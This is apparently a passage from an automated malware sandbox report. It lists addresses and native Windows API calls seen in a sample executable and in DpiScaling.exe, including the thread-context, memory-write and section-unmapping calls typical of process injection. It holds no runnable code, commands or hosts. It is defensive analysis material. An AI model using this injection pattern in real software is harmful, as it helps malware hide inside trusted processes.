Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A03090 NtSetValueKey,	7_2_01A03090
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A03010 NtOpenDirectoryObject,	7_2_01A03010
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A039B0 NtGetContextThread,	7_2_01A039B0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A03D10 NtOpenProcessToken,	7_2_01A03D10
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A03D70 NtOpenThread,	7_2_01A03D70
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04774650 NtSuspendThread,LdrInitializeThunk,	11_2_04774650
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04774340 NtSetContextThread,LdrInitializeThunk,	11_2_04774340
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_04772C70
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772C60 NtCreateKey,LdrInitializeThunk,	11_2_04772C60
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772CA0 NtQueryInformationToken,LdrInitializeThunk,	11_2_04772CA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772D30 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_04772D30
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772D10 NtMapViewOfSection,LdrInitializeThunk,	11_2_04772D10
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_04772DF0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772DD0 NtDelayExecution,LdrInitializeThunk,	11_2_04772DD0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772EE0 NtQueueApcThread,LdrInitializeThunk,	11_2_04772EE0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772E80 NtReadVirtualMemory,LdrInitializeThunk,	11_2_04772E80
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772F30 NtCreateSection,LdrInitializeThunk,	11_2_04772F30
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772FE0 NtCreateFile,LdrInitializeThunk,	11_2_04772FE0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772FB0 NtResumeThread,LdrInitializeThunk,	11_2_04772FB0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772AF0 NtWriteFile,LdrInitializeThunk,	11_2_04772AF0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772AD0 NtReadFile,LdrInitializeThunk,	11_2_04772AD0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772B60 NtClose,LdrInitializeThunk,	11_2_04772B60
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_04772BF0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772BE0 NtQueryValueKey,LdrInitializeThunk,	11_2_04772BE0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772BA0 NtEnumerateValueKey,LdrInitializeThunk,	11_2_04772BA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047735C0 NtCreateMutant,LdrInitializeThunk,	11_2_047735C0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047739B0 NtGetContextThread,LdrInitializeThunk,	11_2_047739B0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772C00 NtQueryInformationProcess,	11_2_04772C00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772CF0 NtOpenProcess,	11_2_04772CF0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772CC0 NtQueryVirtualMemory,	11_2_04772CC0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772D00 NtSetInformationFile,	11_2_04772D00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772DB0 NtEnumerateKey,	11_2_04772DB0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772E30 NtWriteVirtualMemory,	11_2_04772E30
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772EA0 NtAdjustPrivilegesToken,	11_2_04772EA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772F60 NtCreateProcessEx,	11_2_04772F60
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772FA0 NtQuerySection,	11_2_04772FA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772F90 NtProtectVirtualMemory,	11_2_04772F90
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772AB0 NtWaitForSingleObject,	11_2_04772AB0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04772B80 NtQueryInformationFile,	11_2_04772B80
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04773010 NtOpenDirectoryObject,	11_2_04773010
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04773090 NtSetValueKey,	11_2_04773090
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04773D70 NtOpenThread,	11_2_04773D70
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04773D10 NtOpenProcessToken,	11_2_04773D10
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_006A9970 NtCreateFile,	11_2_006A9970
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_006A9AE0 NtReadFile,	11_2_006A9AE0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_006A9BD0 NtDeleteFile,	11_2_006A9BD0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_006A9C70 NtClose,	11_2_006A9C70
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_006A9DD0 NtAllocateVirtualMemory,	11_2_006A9DD0

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_016B3E1C	0_2_016B3E1C
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_016B6F93	0_2_016B6F93
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_016BDFC4	0_2_016BDFC4
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_079674D0	0_2_079674D0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_07969278	0_2_07969278
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_07967088	0_2_07967088
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_07966C60	0_2_07966C60
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_0796DB10	0_2_0796DB10
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_079688D8	0_2_079688D8
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_079688C8	0_2_079688C8
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00418F23	7_2_00418F23
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00403095	7_2_00403095
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_004030A0	7_2_004030A0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0040E959	7_2_0040E959
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00410963	7_2_00410963
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0040E963	7_2_0040E963
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0041710F	7_2_0041710F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00417113	7_2_00417113
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_004022D6	7_2_004022D6
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_004022E0	7_2_004022E0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0040EAA8	7_2_0040EAA8
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0040EAB3	7_2_0040EAB3
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0040EB7B	7_2_0040EB7B
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00402C50	7_2_00402C50
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0040248D	7_2_0040248D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00402490	7_2_00402490
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0042F5A3	7_2_0042F5A3
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00410743	7_2_00410743
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00402780	7_2_00402780
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A901AA	7_2_01A901AA
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A841A2	7_2_01A841A2
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A881CC	7_2_01A881CC
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C0100	7_2_019C0100
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6A118	7_2_01A6A118
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A58158	7_2_01A58158
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A62000	7_2_01A62000
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A903E6	7_2_01A903E6
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019DE3F0	7_2_019DE3F0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8A352	7_2_01A8A352
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A502C0	7_2_01A502C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70274	7_2_01A70274
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A90591	7_2_01A90591
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D0535	7_2_019D0535
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A7E4F6	7_2_01A7E4F6
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A74420	7_2_01A74420
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A82446	7_2_01A82446
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CC7C0	7_2_019CC7C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019F4750	7_2_019F4750
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D0770	7_2_019D0770
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019EC6E0	7_2_019EC6E0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A9A9A6	7_2_01A9A9A6
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D29A0	7_2_019D29A0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E6962	7_2_019E6962
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019B68B8	7_2_019B68B8
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019FE8F0	7_2_019FE8F0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019DA840	7_2_019DA840
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D2840	7_2_019D2840
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A86BD7	7_2_01A86BD7
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8AB40	7_2_01A8AB40
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CEA80	7_2_019CEA80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E8DBF	7_2_019E8DBF
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019CADE0	7_2_019CADE0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019DAD00	7_2_019DAD00
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6CD1F	7_2_01A6CD1F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A70CB5	7_2_01A70CB5
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C0CF2	7_2_019C0CF2
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D0C00	7_2_019D0C00
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A4EFA0	7_2_01A4EFA0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C2FC8	7_2_019C2FC8
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019DCFE0	7_2_019DCFE0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A12F28	7_2_01A12F28
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A72F30	7_2_01A72F30
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019F0F30	7_2_019F0F30
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A44F40	7_2_01A44F40
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019E2E90	7_2_019E2E90
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8CE93	7_2_01A8CE93
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8EEDB	7_2_01A8EEDB
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8EE26	7_2_01A8EE26
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D0E59	7_2_019D0E59
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019DB1B0	7_2_019DB1B0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A9B16B	7_2_01A9B16B
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A0516C	7_2_01A0516C
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BF172	7_2_019BF172
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A870E9	7_2_01A870E9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8F0E0	7_2_01A8F0E0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D70C0	7_2_019D70C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A7F0CC	7_2_01A7F0CC
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A1739A	7_2_01A1739A
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8132D	7_2_01A8132D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019BD34C	7_2_019BD34C
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D52A0	7_2_019D52A0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A712ED	7_2_01A712ED
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019EB2C0	7_2_019EB2C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6D5B0	7_2_01A6D5B0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A87571	7_2_01A87571
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8F43F	7_2_01A8F43F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019C1460	7_2_019C1460
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8F7B0	7_2_01A8F7B0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A816CC	7_2_01A816CC
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A65910	7_2_01A65910
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D9950	7_2_019D9950
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019EB950	7_2_019EB950
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D38E0	7_2_019D38E0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A3D800	7_2_01A3D800
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019EFB80	7_2_019EFB80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A45BF0	7_2_01A45BF0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A0DBF9	7_2_01A0DBF9
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8FB76	7_2_01A8FB76
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A15AA0	7_2_01A15AA0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A71AA3	7_2_01A71AA3
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A6DAAC	7_2_01A6DAAC
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A7DAC6	7_2_01A7DAC6
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A43A6C	7_2_01A43A6C
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8FA49	7_2_01A8FA49
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A87A46	7_2_01A87A46
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019EFDC0	7_2_019EFDC0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A87D73	7_2_01A87D73
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D3D40	7_2_019D3D40
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A81D5A	7_2_01A81D5A
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8FCF2	7_2_01A8FCF2
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A49C32	7_2_01A49C32
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D1F92	7_2_019D1F92
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8FFB1	7_2_01A8FFB1
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A8FF09	7_2_01A8FF09
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_019D9EB0	7_2_019D9EB0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047F2446	11_2_047F2446
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047E4420	11_2_047E4420
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047EE4F6	11_2_047EE4F6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04800591	11_2_04800591
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04740535	11_2_04740535
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0475C6E0	11_2_0475C6E0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04740770	11_2_04740770
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04764750	11_2_04764750
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0473C7C0	11_2_0473C7C0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047D2000	11_2_047D2000
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047C8158	11_2_047C8158
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_048001AA	11_2_048001AA
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047DA118	11_2_047DA118
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04730100	11_2_04730100
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047F81CC	11_2_047F81CC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047F41A2	11_2_047F41A2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047E0274	11_2_047E0274
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047C02C0	11_2_047C02C0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FA352	11_2_047FA352
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_048003E6	11_2_048003E6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0474E3F0	11_2_0474E3F0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04740C00	11_2_04740C00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04730CF2	11_2_04730CF2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047E0CB5	11_2_047E0CB5
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047DCD1F	11_2_047DCD1F
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0474AD00	11_2_0474AD00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0473ADE0	11_2_0473ADE0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04758DBF	11_2_04758DBF
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04740E59	11_2_04740E59
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FEE26	11_2_047FEE26
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FEEDB	11_2_047FEEDB
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04752E90	11_2_04752E90
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FCE93	11_2_047FCE93
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047B4F40	11_2_047B4F40
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04760F30	11_2_04760F30
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047E2F30	11_2_047E2F30
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04782F28	11_2_04782F28
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0474CFE0	11_2_0474CFE0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04732FC8	11_2_04732FC8
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047BEFA0	11_2_047BEFA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0474A840	11_2_0474A840
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04742840	11_2_04742840
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0476E8F0	11_2_0476E8F0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047268B8	11_2_047268B8
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04756962	11_2_04756962
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0480A9A6	11_2_0480A9A6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047429A0	11_2_047429A0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0473EA80	11_2_0473EA80
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FAB40	11_2_047FAB40
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047F6BD7	11_2_047F6BD7
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04731460	11_2_04731460
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FF43F	11_2_047FF43F
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047F7571	11_2_047F7571
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_048095C3	11_2_048095C3
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047DD5B0	11_2_047DD5B0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04785630	11_2_04785630
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047F16CC	11_2_047F16CC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FF7B0	11_2_047FF7B0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047F70E9	11_2_047F70E9
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FF0E0	11_2_047FF0E0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047EF0CC	11_2_047EF0CC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047470C0	11_2_047470C0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0472F172	11_2_0472F172
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0477516C	11_2_0477516C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0474B1B0	11_2_0474B1B0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0480B16B	11_2_0480B16B
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047E12ED	11_2_047E12ED
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0475B2C0	11_2_0475B2C0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047452A0	11_2_047452A0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0472D34C	11_2_0472D34C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047F132D	11_2_047F132D
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0478739A	11_2_0478739A
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047B9C32	11_2_047B9C32
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FFCF2	11_2_047FFCF2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047F7D73	11_2_047F7D73
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047F1D5A	11_2_047F1D5A
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04743D40	11_2_04743D40
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0475FDC0	11_2_0475FDC0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04749EB0	11_2_04749EB0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FFF09	11_2_047FFF09
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04703FD2	11_2_04703FD2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04703FD5	11_2_04703FD5
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FFFB1	11_2_047FFFB1
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04741F92	11_2_04741F92
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047AD800	11_2_047AD800
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047438E0	11_2_047438E0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04749950	11_2_04749950
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0475B950	11_2_0475B950
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047D5910	11_2_047D5910
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047B3A6C	11_2_047B3A6C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FFA49	11_2_047FFA49
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047F7A46	11_2_047F7A46
